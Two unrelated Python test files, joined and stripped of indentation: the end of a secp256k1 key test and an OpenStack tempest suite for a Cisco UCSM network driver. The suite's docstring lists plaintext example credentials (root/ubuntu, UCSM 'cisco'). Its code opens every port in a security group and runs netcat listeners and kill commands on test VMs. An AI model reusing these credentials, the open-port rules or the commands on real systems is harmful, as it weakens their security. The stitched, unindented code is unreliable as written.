k = 115792089237316195423570985008687907852837564279074904382605163141518161494325
x = 0xD01115D548E7561B15C38F004D734633687CF4419620095BC5B0F47070AFE85A
y = 0x560CB00237EA1F285749BAC81E8427EA86DC73A2265792AD94FAE4EB0BF9D908
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494326
x = 0x774AE7F858A9411E5EF4246B70C65AAC5649980BE5C17891BBEC17895DA008CB
y = 0x267B5FCD1494A1E6FDBC22A928484C9AC8D24E1D20062957CFE28B3536AC3614
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494327
x = 0xA0434D9E47F3C86235477C7B1AE6AE5D3442D49B1943C2B752A68E2A47E247C7
y = 0x76C545BDABE643D85C4938196C5DB3969086B3D127885EA6C3411AC3FC8C9358
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494328
x = 0xACD484E2F0C7F65309AD178A9F559ABDE09796974C57E714C35F110DFC27CCBE
y = 0x33CC76DE4F5826029BC7F68E89C49E165227775BC8A071F0FA33D9D439B05FF8
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494329
x = 0x2F01E5E15CCA351DAFF3843FB70F3C2F0A1BDD05E5AF888A67784EF3E10A2A01
y = 0xA3B25758BEAC66B6D6C2F7D5ECD2EC4B3D1DEC2945A489E84A25D3479342132B
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494330
x = 0x5CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC
y = 0x951435BF45DAA69F5CE8729279E5AB2457EC2F47EC02184A5AF7D9D6F78D9755
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494331
x = 0xFFF97BD5755EEEA420453A14355235D382F6472F8568A18B2F057A1460297556
y = 0x51ED8885530449DF0C4169FE80BA3A9F217F0F09AE701B5FC378F3C84F8A0998
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494332
x = 0x2F8BDE4D1A07209355B4A7250A5C5128E88B84BDDC619AB7CBA8D569B240EFE4
y = 0x2753DDD9C91A1C292B24562259363BD90877D8E454F297BF235782C459539959
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494333
x = 0xE493DBF1C10D80F3581E4904930B1404CC6C13900EE0758474FA94ABE8C4CD13
y = 0xAE1266C15F2BAA48A9BD1DF6715AEBB7269851CC404201BF30168422B88C630D
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494334
x = 0xF9308A019258C31049344F85F89D5229B531C845836F99B08601F113BCE036F9
y = 0xC77084F09CD217EBF01CC819D5C80CA99AFF5666CB3DDCE4934602897B4715BD
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494335
x = 0xC6047F9441ED7D6D3045406E95C07CD85C778E4B8CEF3CA7ABAC09B95C709EE5
y = 0xE51E970159C23CC65C3A7BE6B99315110809CD9ACD992F1EDC9BCE55AF301705
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494336
x = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
y = 0xB7C52588D95C3B9AA25B0403F1EEF75702E84BB7597AABE663B82F6F04EF2777
test_points.append((k, x, y))
k = 0xaa5e28d6a97a2479a65527f7290311a3624d4cc0fa1578598ee3c2613bf99522
x = 0x34f9460f0e4f08393d192b3c5133a6ba099aa0ad9fd54ebccfacdfa239ff49c6
y = 0x0b71ea9bd730fd8923f6d25a7a91e7dd7728a960686cb5a901bb419e0f2ca232
test_points.append((k, x, y))
k = 0x7e2b897b8cebc6361663ad410835639826d590f393d90a9538881735256dfae3
x = 0xd74bf844b0862475103d96a611cf2d898447e288d34b360bc885cb8ce7c00575
y = 0x131c670d414c4546b88ac3ff664611b1c38ceb1c21d76369d7a7a0969d61d97d
test_points.append((k, x, y))
k = 0x6461e6df0fe7dfd05329f41bf771b86578143d4dd1f7866fb4ca7e97c5fa945d
x = 0xe8aecc370aedd953483719a116711963ce201ac3eb21d3f3257bb48668c6a72f
y = 0xc25caf2f0eba1ddb2f0f3f47866299ef907867b7d27e95b3873bf98397b24ee1
test_points.append((k, x, y))
k = 0x376a3a2cdcd12581efff13ee4ad44c4044b8a0524c42422a7e1e181e4deeccec
x = 0x14890e61fcd4b0bd92e5b36c81372ca6fed471ef3aa60a3e415ee4fe987daba1
y = 0x297b858d9f752ab42d3bca67ee0eb6dcd1c2b7b0dbe23397e66adc272263f982
test_points.append((k, x, y))
k = 0x1b22644a7be026548810c378d0b2994eefa6d2b9881803cb02ceff865287d1b9
x = 0xf73c65ead01c5126f28f442d087689bfa08e12763e0cec1d35b01751fd735ed3
y = 0xf449a8376906482a84ed01479bd18882b919c140d638307f0c0934ba12590bde
test_points.append((k, x, y))
for k, x, y in test_points:
p = Point(secp256k1_curve, x, y)
self.assertTrue(secp256k1_curve.contains_point(p.x(), p.y()))
K = Key(public_pair=(x, y))
k = Key(secret_exponent=k)
self.assertEqual(K.public_pair(), k.public_pair())
x = y = 0
self.assertRaises(NoSuchPointError, Point, secp256k1_curve, x, y)
self.assertRaises(InvalidPublicPairError, Key, public_pair=(0, 0))
def test_repr(self):
key = Key(secret_exponent=273, netcode='XTN')
address = key.address()
pub_k = Key.from_text(address)
self.assertEqual(repr(pub_k), '<mhDVBkZBWLtJkpbszdjZRkH1o5RZxMwxca>')
wif = key.wif()
priv_k = Key.from_text(wif)
self.assertEqual(repr(priv_k), 'private_for <0264e1b1969f9102977691a40431b0b672055dcf31163897d996434420e6c95dc9>')
if __name__ == '__main__':
unittest.main()
| |
# Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The tests need special image uploaded to glance:
* It has "Cisco enic" driver installed
* Configured to log into it with username/password
Before running the tests:
* create 'tempest.conf' file in 'etc' folder (default location)
* add/update following parameters to tempest.conf
* replace parameter values with correct ones for your OS installation
##############################################################################
# Example of tempest.conf file
##############################################################################
[DEFAULT]
debug = true
use_stderr = false
log_file = tempest.log
[auth]
tempest_roles = _member_
allow_tenant_isolation = True
[compute]
ssh_auth_method = 'configured'
# username to log into an instance.
image_ssh_user = 'root'
# password to log into an instance
image_ssh_password = 'ubuntu'
# flavor id. The flavor should have >= 4Gb of RAM
flavor_ref = 3
flavor_ref_alt = 3
# Image id. Used to boot an instance
image_ref = 60ad4b1e-c5d4-49ad-a9ca-6374c1d8b3f6
# Same as above
image_ref_alt = 60ad4b1e-c5d4-49ad-a9ca-6374c1d8b3f6
[identity]
username = demo
tenant_name = demo
password = demo
alt_username = alt_demo
alt_tenant_name = alt_demo
alt_password = secrete
# There should be OS admin user (with admin role) credentials.
# It will be used by the tests to create another non-admin users
admin_username = admin
admin_tenant_name = admin
admin_domain_name = Default
disable_ssl_certificate_validation = false
# Set correct IP address
uri = http://172.29.173.85:5000/v2.0/
auth_version = v2
# Set correct admin password
admin_password = 1567c9ff7c66376a333d28dfa1a5a3cd717156c7
# Set correct IP address
uri_v3 = http://172.29.173.85:5000/v3/
# Set correct admin tenant id
admin_tenant_id = 725d6fa98000418f88e47d283d8f1efb
[service_available]
neutron = True
[network]
# id of your public network
public_network_id = 1c87c1d3-bd1a-4738-bd55-99a84fa45c87
[ucsm]
# UCSM VIP
ucsm_ip=10.30.119.66
# UCSM username
ucsm_username=admin
# UCSM ppassword
ucsm_password=cisco
# Dictionary of <hostname> VS <UCSM service profile name>. Compute nodes
compute_host_dict=controller:org-root/ls-tmpl,compute-1:org-root/ls-tmpl
# Dictionary of <hostname> VS <UCSM service profile name>. Controller nodes
controller_host_dict=controller:org-root/ls-tmpl
# List of vNIC names
eth_names=eth0,eth1
# Amount of "SR-IOV ports"/"Dynamic VNICs"/"Virtual functions"
virtual_functions_amount=4
# Set it to False if you wnat to skip sonnectivity tests
test_connectivity=True
# Parameters needed for testing multi-ucsm installation
# UCSMs list. Each UCSM has it's own section named [ucsm:<ucsm ip>] below
ucsm_list = 10.10.0.200,10.10.0.156
# List of physical networks used in Openstack
physnets = physnet1
# Parameters of a particular UCSM
[ucsm:10.10.0.200]
eth_names=eth0,eth1
ucsm_username=ucspe
ucsm_password=ucspe
# Dictionary of controller nodes and service profiles associated with them
controller_host_dict=controller:org-root/ls-sp11
# Dictionary of compute nodes and service profiles associated with them
compute_host_dict=controller:org-root/ls-sp11
# Dictionary of vNIC templates
vnic_template_dict = physnet1:org-root/lan-conn-templ-vnic_template
[ucsm:10.10.0.156]
eth_names=eth0,eth1
ucsm_username=ucspe
ucsm_password=ucspe
#controller_host_dict=controller
compute_host_dict=compute-1:org-root/ls-sp21
vnic_template_dict = physnet1:org-root/lan-conn-templ-vnic_template
##############################################################################
#
##############################################################################
Use environment variables to set location of "tempest.conf"
Ex:
export TEMPEST_CONFIG_DIR=/etc/redhat-certification-openstack/
export TEMPEST_CONFIG=tempest.conf
It is better to create dedicated virtualenv for the tempest:
* Run: 'virtualenv myenv'
* Activate the environment. Run: 'source myenv/bin/activate'
* Install python requirements: Run: 'pip install -r requirements.txt'
Running tests:
* Create testr repository: 'testr init'
* Look for tests: 'testr list-tests | grep cisco'
* Run tests:
'testr run tempest.thirdparty.cisco.test_ucsm'
"""
import netaddr
import random
import testtools
import time
from oslo_log import log
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.common import waiters
from tempest import config
from tempest import exceptions
from tempest.scenario import manager
from tempest import test
from tempest.thirdparty.cisco import base as cisco_base
CONF = config.CONF
LOG = log.getLogger(__name__)
class FuzzyDict(dict):
pass
class UCSMTest(manager.NetworkScenarioTest, cisco_base.UCSMTestMixin):
@classmethod
def setup_credentials(cls):
# Create no network resources for these tests.
cls.set_network_resources()
super(UCSMTest, cls).setup_credentials()
@classmethod
def setup_clients(cls):
cls.manager = cls.os_adm
super(UCSMTest, cls).setup_clients()
# TODO: remove lines below
cls.admin_networks_client = cls.os_adm.networks_client
cls.admin_ports_client = cls.os_adm.ports_client
cls.admin_hosts_client = cls.os_adm.hosts_client
cls.servers_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(UCSMTest, cls).resource_setup()
super(UCSMTest, cls).ucsm_resource_setup()
def setUp(self):
super(UCSMTest, self).setUp()
self.keypairs = {}
self.servers = []
self.security_group = self._create_security_group(
security_group_rules_client=self.security_group_rules_client,
security_groups_client=self.security_groups_client)
# Log into UCS Manager
self.ucsm_setup()
self.addCleanup(self.ucsm_cleanup)
def _create_security_group(self, security_group_rules_client=None,
tenant_id=None,
namestart='secgroup-smoke',
security_groups_client=None):
secgroup = super(UCSMTest, self)._create_security_group(
security_group_rules_client=security_group_rules_client,
security_groups_client=security_groups_client)
# The group should allow all protocols
rulesets = [
dict(
# all tcp
protocol='tcp',
port_range_min=1,
port_range_max=65535,
),
dict(
# all udp
protocol='udp',
port_range_min=1,
port_range_max=65535,
),
]
for ruleset in rulesets:
for r_direction in ['ingress', 'egress']:
ruleset['direction'] = r_direction
self._create_security_group_rule(
sec_group_rules_client=security_group_rules_client,
security_groups_client=security_groups_client,
secgroup=secgroup, **ruleset)
return secgroup
def _get_server_key(self, server):
return self.keypairs[server['key_name']]['private_key']
def create_networks(self, networks_client=None,
tenant_id=None, dns_nameservers=None,
network_kwargs=None):
"""Create a network with a subnet connected to a router.
The baremetal driver is a special case since all nodes are
on the same shared network.
:param client: network client to create resources with.
:param tenant_id: id of tenant to create resources in.
:param dns_nameservers: list of dns servers to send to subnet.
:returns: network, subnet, router
"""
network_kwargs = network_kwargs or {}
if CONF.baremetal.driver_enabled:
# NOTE(Shrews): This exception is for environments where tenant
# credential isolation is available, but network separation is
# not (the current baremetal case). Likely can be removed when
# test account mgmt is reworked:
# https://blueprints.launchpad.net/tempest/+spec/test-accounts
if not CONF.compute.fixed_network_name:
m = 'fixed_network_name must be specified in config'
raise exceptions.InvalidConfiguration(m)
network = self._get_network_by_name(
CONF.compute.fixed_network_name)
router = None
subnet = None
else:
network = self._create_network(**network_kwargs)
if CONF.ucsm.provider_network_id:
router = None
subnet = None
else:
router = self._get_router(tenant_id=tenant_id)
subnet_kwargs = dict(network=network)
# use explicit check because empty list is a valid option
if dns_nameservers is not None:
subnet_kwargs['dns_nameservers'] = dns_nameservers
subnet = self._create_subnet(**subnet_kwargs)
self.routers_client.add_router_interface(router['id'], subnet_id=subnet['id'])
return network, subnet, router
def _create_network(self, networks_client=None, routers_client=None,
tenant_id=None, namestart='network-smoke-', **kwargs):
if not networks_client:
networks_client = self.networks_client
if not tenant_id:
tenant_id = networks_client.tenant_id
if not routers_client:
routers_client = self.routers_client
name = data_utils.rand_name(namestart)
if CONF.ucsm.provider_network_id:
# Get info because this is provider network
result = networks_client.show_network(CONF.ucsm.provider_network_id)
else:
result = networks_client.create_network(name=name, tenant_id=tenant_id, **kwargs)
network = FuzzyDict(result['network'])
self.assertEqual(network['name'], name)
if CONF.ucsm.provider_network_id:
# Mock delete method because this is provider network
network['name'] = name
network.delete = lambda: True
else:
self.addCleanup(test_utils.call_and_ignore_notfound_exc,
self.networks_client.delete_network,
network['id'])
# some tests may still expect delete method
network.delete = lambda: self.networks_client.delete_network(network['id'])
return network
def _create_port(self, network_id, client=None, namestart='port-quotatest',
**kwargs):
if not client:
client = self.ports_client
name = data_utils.rand_name(namestart)
result = client.create_port(
name=name,
network_id=network_id,
**kwargs)
self.assertIsNotNone(result, 'Unable to allocate port')
port = result['port']
self.addCleanup(test_utils.call_and_ignore_notfound_exc,
client.delete_port, port['id'])
return port
def _create_server(self, name, network_id=None,
port_id=None, availability_zone=None):
keypair = self.create_keypair(client=self.keypairs_client)
self.keypairs[keypair['name']] = keypair
security_groups = [{'name': self.security_group['name']}]
create_kwargs = {
'networks': [{}],
'key_name': keypair['name'],
'security_groups': security_groups,
}
if network_id is not None:
create_kwargs['networks'][0]['uuid'] = network_id
if port_id is not None:
create_kwargs['networks'][0]['port'] = port_id
if availability_zone is not None:
create_kwargs['availability_zone'] = availability_zone
server = self.create_server(name=name, wait_until='ACTIVE', clients=self.os_adm, **create_kwargs)
self.servers.append(server)
return server
def create_floating_ip(self, thing, external_network_id=None,
port_id=None, client=None):
"""Creates a floating IP and associates to a resource/port using
Neutron client
"""
if not external_network_id:
external_network_id = CONF.network.public_network_id
if not client:
client = self.floating_ips_client
if not port_id:
port_id, ip4 = self._get_server_port_id_and_ip4(thing)
else:
ip4 = None
if CONF.ucsm.provider_network_id:
return {
'floating_ip_address': ip4,
'fixed_ip_address': ip4
}
result = client.create_floatingip(
floating_network_id=external_network_id,
port_id=port_id,
tenant_id=thing['tenant_id'],
fixed_ip_address=ip4
)
floating_ip = result['floating_ip']
self.addCleanup(test_utils.call_and_ignore_notfound_exc,
self.compute_floating_ips_client.delete_floating_ip,
floating_ip['id'])
return floating_ip
def check_public_network_connectivity(
self, server, floating_ip, should_connect=True, msg=None,
should_check_floating_ip_status=True):
"""Verifies connectivty to a VM via public network and floating IP,
and verifies floating IP has resource status is correct.
"""
ssh_login = CONF.validation.image_ssh_user
ip_address = floating_ip['floating_ip_address']
private_key = None
floatingip_status = 'DOWN'
if should_connect:
private_key = self._get_server_key(server)
floatingip_status = 'ACTIVE'
# Check FloatingIP Status before initiating a connection
if not CONF.ucsm.provider_network_id:
# If this not a 'provider network' deployment
if should_check_floating_ip_status:
self.check_floating_ip_status(floating_ip, floatingip_status)
# call the common method in the parent class
super(UCSMTest, self).check_public_network_connectivity(
ip_address, ssh_login, private_key, should_connect, msg,
self.servers)
def assert_vm_to_vm_connectivity(self, server1, server2):
floating_ip1 = self.create_floating_ip(server1)
floating_ip2 = self.create_floating_ip(server2)
# Wait while driver applies settings
time.sleep(10)
server1_client = self.get_remote_client(
floating_ip1['floating_ip_address'],
CONF.validation.image_ssh_user,
self._get_server_key(server1))
server2_client = self.get_remote_client(
floating_ip2['floating_ip_address'],
CONF.validation.image_ssh_user,
self._get_server_key(server2))
# Ping server2 from server1 and vice versa
self.assertNotEmpty(
server1_client.ping_host(floating_ip2['floating_ip_address']))
self.assertNotEmpty(
server2_client.ping_host(floating_ip1['floating_ip_address']))
def assert_vm2vm(self, server1, server2):
floating_ip1 = self.create_floating_ip(server1)
floating_ip2 = self.create_floating_ip(server2)
# Wait while driver applies settings
time.sleep(10)
server1_client = self.get_remote_client(
floating_ip1['floating_ip_address'],
CONF.validation.image_ssh_user,
self._get_server_key(server1))
server2_client = self.get_remote_client(
floating_ip2['floating_ip_address'],
CONF.validation.image_ssh_user,
self._get_server_key(server2))
nc = 'nc'
port = 5000
message = 'Hi there!'
# Run listener
server2_client.exec_command('kill -9 `pidof "nc"` || true')
server2_client.exec_command('{0} -l -p {1} -s {2} > out.log &'.format(nc, port, floating_ip2['fixed_ip_address']))
# Send message
server1_client.exec_command(
'echo -n "{0}" | {1} -w1 -p {2} {3} {4} || true'.format(message, nc, port, floating_ip2['fixed_ip_address'], port))
# Read received message
received = server2_client.exec_command("cat out.log; rm out.log")
self.assertEqual(message, received, 'Verify received message')
def _delete_network(self, network):
self.networks_client.delete_network(network['id'])
def _delete_networks(self, networks):
for n in networks:
self._delete_network(n)
# Asserting that the networks are not found in the list after deletion
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in networks:
self.assertNotIn(n['id'], networks_list)
@test.attr(type='non-sriov')
def test_create_delete_networks(self):
"""Covered test cases:
* Creating vlan profiles
* Deleting vlan profiles
* Adding vlans to both VNICs of a service profile
* Deleting vlans from both VNICs of a service profile
"""
self._verify_single_ucsm_configured()
# Create network and subnet (DHCP enabled)
network = self._create_network()
self.assertEqual('ACTIVE', network['status'])
self._create_subnet(network)
port = self._create_port(
network['id'], security_groups=[self.security_group['id']])
# Get a vlan id and verify a vlan profile has been created
network = self.admin_networks_client.show_network(network['id'])['network']
vlan_id = network['provider:segmentation_id']
# Verify VLAN Profiles have not been created yet because there are no
# active ports
self.timed_assert(self.assertEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
server = self._create_server(data_utils.rand_name('server-smoke'),
port_id=port['id'])
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify vlan has been added to both vnics
for service_profile in self.controller_host_dict.values():
for eth_name in self.eth_names:
self.timed_assert(
self.assertNotEmpty,
lambda: self.ucsm.get_ether_vlan(service_profile,
eth_name, vlan_id))
# Delete network and verify that the vlan profile has been removed
self.servers_client.delete_server(server['id'])
waiters.wait_for_server_termination(self.servers_client, ['id'])
self.ports_client.delete_port(port['id'])
self._delete_network(network)
self.timed_assert(self.assertEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify the vlan has been removed from both vnics
for service_profile in self.controller_host_dict.values():
for eth_name in self.eth_names:
self.timed_assert(
self.assertEmpty,
lambda: self.ucsm.get_ether_vlan(
service_profile, eth_name, vlan_id))
@test.attr(type='non-sriov')
def test_create_delete_bulk_networks(self):
"""Covered test cases:
* Create bulk vlan profiles
* Add bulk vlans to both vnics
* Delete bulk vlans from both vnics
"""
self._verify_single_ucsm_configured()
# Create networks
names = [data_utils.rand_name('network-') for i in range(5)]
data = {'networks': [{'name': name} for name in names]}
networks = self.networks_client.create_bulk_networks(**data)['networks']
vlan_ids = [self.admin_networks_client.show_network(n['id'])
['network']['provider:segmentation_id'] for n in networks]
# Create subnets (DHCP enabled)
cidr = netaddr.IPNetwork(CONF.network.project_network_cidr)
mask_bits = CONF.network.project_network_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-')
for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': 4
}
subnets_list.append(p1)
self.subnets_client.create_bulk_subnets(**{'subnets': subnets_list})
# Verify VLAN Profiles have not been created yet because there are no
# active ports
for vlan_id in vlan_ids:
self.timed_assert(self.assertEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
ports_list = []
servers_list = []
for network in networks:
port = self._create_port(
network['id'], security_groups=[self.security_group['id']])
server = self._create_server(data_utils.rand_name('server-smoke'),
port_id=port['id'])
ports_list.append(port)
servers_list.append(server)
# Get vlan ids and verify vlan profiles have been created
for vlan_id in vlan_ids:
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify all vlans have been added to both vnics
for service_profile in self.controller_host_dict.values():
for eth_name in self.eth_names:
self.timed_assert(
self.assertNotEmpty,
lambda: self.ucsm.get_ether_vlan(
service_profile, eth_name, vlan_id))
# Delete networks and verify all vlan profiles have been removed
for server in servers_list:
self.servers_client.delete_server(server['id'])
waiters.wait_for_server_termination(self.servers_client, ['id'])
for port in ports_list:
self.ports_client.delete_port(port['id'])
self._delete_networks(networks)
for vlan_id in vlan_ids:
self.timed_assert(self.assertEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify all vlans have been removed from both vnics
for service_profile in self.controller_host_dict.values():
for eth_name in self.eth_names:
self.timed_assert(
self.assertEmpty,
lambda: self.ucsm.get_ether_vlan(
service_profile, eth_name, vlan_id))
@testtools.skip("Feature not implemented")
@test.attr(type='non-sriov')
def test_create_vlan_profile_invalid_vlan_id(self):
"""Covered test cases:
* Driver does not create VLAN profiles if VLAN ID >= 4000
"""
segmentation_id = random.randint(4000, 4093)
kwargs = {'provider:network_type': 'vlan',
'provider:physical_network': 'physnet1',
'provider:segmentation_id': segmentation_id}
# TODO(nfedotov): Should raise exception.
# UCSM does not allow to create vlans
# from 4000 to 4093 (need to figure out correct values)
self.admin_networks_client.create_network(
name=data_utils.rand_name('network-'), **kwargs)['network']
@test.attr(type='sriov')
# @testtools.skip("https://bugs.launchpad.net/"
# "networking-cisco/+bug/1476721")
def test_create_delete_sriov_port(self):
"""Covered test cases:
* Creating SR-IOV port and port profile
* Deleting SR-IOV port and port profile
* Attaching instance to SR-IOV port
"""
self._verify_single_ucsm_configured()
self._verify_sriov_configured()
# Create network, subnet and port (type=direct)
network_obj = self._create_network()
self.assertEqual('ACTIVE', network_obj['status'])
self._create_subnet(network_obj, enable_dhcp=False)
kwargs = {'binding:vnic_type': 'direct'}
port_obj = self._create_port(network_obj['id'], **kwargs)
create_kwargs = {
'networks': [
{'port': port_obj['id']},
]
}
# Create server
server_name = data_utils.rand_name('server-smoke')
server = self.create_server(name=server_name,
**create_kwargs)
# Verify vlan profile has been created
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify port profile has been created
port = self.admin_ports_client.show_port(port_obj['id'])['port']
port_profile_id = port['binding:vif_details'].get('profileid', None)
port_profile_dn = 'fabric/lan/profiles/vnic-' + port_profile_id
self.assertIsNotNone(port_profile_id,
'vif_details have a profileid attribute')
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_port_profile(port_profile_dn))
port_profile = self.ucsm.get_port_profile(port_profile_dn)
self.assertNotEmpty(port_profile,
'Port profile has been created in UCSM')
# Verify the port profile has a correct VLAN
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vnic_ether_if(port_profile))
port_profile_vlans = self.ucsm.get_vnic_ether_if(port_profile)
self.assertEqual(str(vlan_id), port_profile_vlans[0].Vnet,
'Vlan has been added to port profile')
# Delete server, port, network. Verify port profile and vlan have
# been removed
self.servers_client.delete_server(server['id'])
waiters.wait_for_server_termination(self.servers_client, server['id'])
self.ports_client.delete_port(port_obj['id'])
network_obj.delete()
# self.assertEmpty(self.ucsm.get_port_profile(port_profile_dn),
# 'Port profile has been removed in UCSM')
# self.timed_assert(self.assertEmpty,
# lambda: self.ucsm.get_vlan_profile(vlan_id))
@test.attr(type='sriov')
# @testtools.skip("https://bugs.launchpad.net/"
# "networking-cisco/+bug/1476721")
def test_create_delete_bulk_sriov_ports(self):
"""Covered test cases:
* Create bulk port profiles
* Delete bulk port profiles
"""
self._verify_single_ucsm_configured()
self._verify_sriov_configured()
master_host = random.choice(self.compute_host_dict.keys())
# Create networks
names = [data_utils.rand_name('network-')
for i in range(self.virtual_functions)]
data = {'networks': [{'name': name} for name in names]}
networks = self.networks_client.create_bulk_networks(**data)['networks']
# Create subnets
cidr = netaddr.IPNetwork(CONF.network.project_network_cidr)
mask_bits = CONF.network.project_network_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
net = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': 4,
'enable_dhcp': False
}
subnets_list.append(net)
self.subnets_client.create_bulk_subnets(**{'subnets': subnets_list})
# Create ports
ports_data = {}
for network in networks:
net_id = network['id']
vlan_id = self.admin_networks_client.show_network(
net_id)['network']['provider:segmentation_id']
port = {
'network_id': net_id,
'binding:vnic_type': 'direct'
}
ports_data[vlan_id] = port
ports_list = self.ports_client.create_bulk_ports(
**{'ports': ports_data.values()})['ports']
# Boot servers
ports = {}
servers = {}
for port in ports_list:
server_name = data_utils.rand_name('server-smoke')
server = self._create_server(
server_name, port_id=port['id'],
availability_zone='nova:' + master_host)
# Create ports dictionary
# Assume we create one port per network.
# Will identify port by network_id
for vlan_id, pd in ports_data.iteritems():
if port['network_id'] == pd['network_id']:
ports[vlan_id] = self.admin_ports_client.show_port(
port['id'])['port']
servers[vlan_id] = server
break
# Verify port profiles have been created
for vlan_id, port in ports.iteritems():
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify port profile has been created
port_profile_id = port['binding:vif_details'].get('profileid',
None)
port_profile_dn = 'fabric/lan/profiles/vnic-' + port_profile_id
self.assertIsNotNone(port_profile_id,
'vif_details have a profileid attribute')
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_port_profile(port_profile_dn))
port_profile = self.ucsm.get_port_profile(port_profile_dn)
self.assertNotEmpty(port_profile,
'Port profile has been created in UCSM')
self.timed_assert(self.assertNotEmpty,
lambda:self.ucsm.get_vnic_ether_if(port_profile))
port_profile_vlans = self.ucsm.get_vnic_ether_if(port_profile)
self.assertEqual(str(vlan_id), port_profile_vlans[0].Vnet,
'Vlan has been added to port profile')
# Delete servers and ports
for vlan_id, server in servers.iteritems():
self.servers_client.delete_server(server['id'])
waiters.wait_for_server_termination(self.servers_client, server['id'])
self.ports_client.delete_port(ports[vlan_id]['id'])
# Delete networks
for network in networks:
self.networks_client.delete_network(network['id'])
# Verify all port profiles have been removed
# for vlan_id, port in ports.iteritems():
# port_profile_id = port['binding:vif_details'].get('profileid',
# None)
# port_profile_dn = 'fabric/lan/profiles/vnic-' + port_profile_id
# self.assertEmpty(self.ucsm.get_port_profile(port_profile_dn),
# 'Port profile has been removed in UCSM')
# self.timed_assert(self.assertEmpty,
# lambda: self.ucsm.get_vlan_profile(vlan_id))
@test.attr(type='sriov')
def test_sriov_intra_vm_to_vm(self):
"""Covered test cases:
* Intra VM to VM connectivity
"""
self._verify_connectivity_tests_enabled()
self._verify_single_ucsm_configured()
self._verify_sriov_configured()
master_host = random.choice(self.compute_host_dict.keys())
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']],
'binding:vnic_type': 'direct'}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on the same compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + master_host)
self.assert_vm_to_vm_connectivity(server1, server2)
@test.attr(type='sriov')
def test_sriov_inter_vm_to_vm(self):
"""Covered test cases:
* Inter VM to VM connectivity
"""
self._verify_connectivity_tests_enabled()
self._verify_single_ucsm_configured()
self._verify_sriov_configured()
self._verify_more_than_one_compute_host_exist()
master_host, slave_host = random.sample(self.compute_host_dict.keys(), 2)
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']],
'binding:vnic_type': 'direct'}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on the same compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + slave_host)
self.assert_vm_to_vm_connectivity(server1, server2)
@test.attr(type='non-sriov')
def test_non_sriov_port_attach(self):
"""Covered test cases:
* Attach instance to non-SR-IOV port
"""
self._verify_single_ucsm_configured()
network_obj, subnet_obj, router_obj = self.create_networks()
port_obj = self._create_port(
network_obj['id'], security_groups=[self.security_group['id']])
server = self._create_server(data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj['id'])
# Verify vlan profile has been created
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
